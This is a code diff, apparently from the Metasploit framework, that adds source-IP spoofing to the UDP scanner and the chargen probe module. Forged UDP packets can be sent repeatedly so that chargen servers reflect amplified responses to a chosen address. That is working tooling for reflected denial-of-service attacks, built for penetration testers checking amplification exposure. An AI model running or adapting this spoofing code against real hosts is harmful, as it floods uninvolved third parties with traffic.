chargen src IP spoofing

Author: jabra-

lib/msf/core/auxiliary/drdos.rb

@@ -8,6 +8,15 @@ module Msf
 ###
 module Auxiliary::DRDoS
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
   def prove_amplification(response_map)
     vulnerable = false
     proofs = []
@@ -43,5 +52,9 @@ def prove_amplification(response_map)
     [ vulnerable, proofs.join(', ') ]
   end
 
+  def spoofed?
+    !datastore['SRCIP'].nil?
+  end
+
 end
 end

lib/msf/core/auxiliary/udp_scanner.rb

@@ -69,6 +69,24 @@ def run_batch(batch)
     scanner_postscan(batch)
   end
 
+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = data
+    p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
+    1.upto(num_packets) do |x|
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
   # Send a packet to a given host and port
   def scanner_send(data, ip, port)
 

modules/auxiliary/scanner/chargen/chargen_probe.rb

@@ -9,8 +9,11 @@
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Capture
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::DRDoS
+  include Msf::Auxiliary::UDPScanner
 
   def initialize
     super(
@@ -45,24 +48,28 @@ def initialize
   end
 
   def run_host(rhost)
-    begin
-      connect_udp
-      pkt = Rex::Text.rand_text_alpha_lower(1)
-      udp_sock.write(pkt)
-      r = udp_sock.recvfrom(65535, 0.1)
+    data = Rex::Text.rand_text_alpha_lower(1)
+    if spoofed?
+      scanner_spoof_send(data, rhost, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      begin
+        connect_udp
+        udp_sock.write(data)
+        r = udp_sock.recvfrom(65535, 0.1)
 
-      if r and r[1]
-        vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
-        res = r[0].to_s.strip
-        if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
-          print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
-          report_service(:host => rhost, :port => rport, :proto => "udp", :name => "chargen", :info => res.length)
+        if r and r[1]
+          vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
+          res = r[0].to_s.strip
+          if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
+            print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
+            report_service(:host => rhost, :port => rport, :proto => "udp", :name => "chargen", :info => res.length)
+          end
         end
+      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
+        nil
+      ensure
+        disconnect_udp if self.udp_sock
       end
-    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
-      nil
-    ensure
-      disconnect_udp if self.udp_sock
     end
   end
 end